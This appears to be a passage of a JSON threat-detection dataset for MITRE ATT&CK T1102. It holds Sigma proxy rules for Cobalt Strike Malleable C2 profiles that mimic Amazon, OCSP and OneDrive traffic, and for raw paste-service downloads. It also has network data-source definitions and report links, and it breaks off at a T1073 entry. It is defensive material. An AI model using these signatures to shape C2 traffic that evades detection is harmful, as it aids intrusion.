+ { + "technique_id": "T1102", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "CobaltStrike Malleable Amazon browsing traffic profile", + "id": "953b895e-5cc9-454b-b183-7f3db555452e", + "status": "experimental", + "description": "Detects Malleable Amazon Profile", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection1": { + "c-useragent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "cs-method": "GET", + "c-uri": "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books", + "cs-host": "www.amazon.com", + "cs-cookie": "*=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996" + }, + "selection2": { + "c-useragent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "cs-method": "POST", + "c-uri": "/N4215/adj/amzn.us.sr.aps", + "cs-host": "www.amazon.com" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "CobaltStrike Malleable (OCSP) Profile", + "id": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "status": "experimental", + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "c-uri": "*/oscp/*", + "cs-host": "ocsp.verisign.com" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "CobaltStrike Malleable OneDrive browsing traffic 
profile", + "id": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "status": "experimental", + "description": "Detects Malleable OneDrive Profile", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "cs-method": "GET", + "c-uri": "*?manifest=wac", + "cs-host": "onedrive.live.com" + }, + "filter": { + "c-uri": "http*://onedrive.live.com/*" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Raw Paste Service Access", + "id": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "status": "experimental", + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "references": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations" + ], + "author": "Florian Roth", + "date": "2019/12/05", + "tags": [ + "attack.t1102", + "attack.defense_evasion" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "c-uri|contains": [ + ".paste.ee/r/", + ".pastebin.com/raw/", + ".hastebin.com/raw/" + ] + }, + "condition": "selection" + }, + "fields": [ + "ClientIP", + "c-uri", + "c-useragent" + ], + "falsepositives": [ + "User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "level": "high" + }, + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + null + ] + }, + { + "technique_id": "T1073", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "action": "global", + "title": "DNS ServerLevelPluginDll Install", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a 
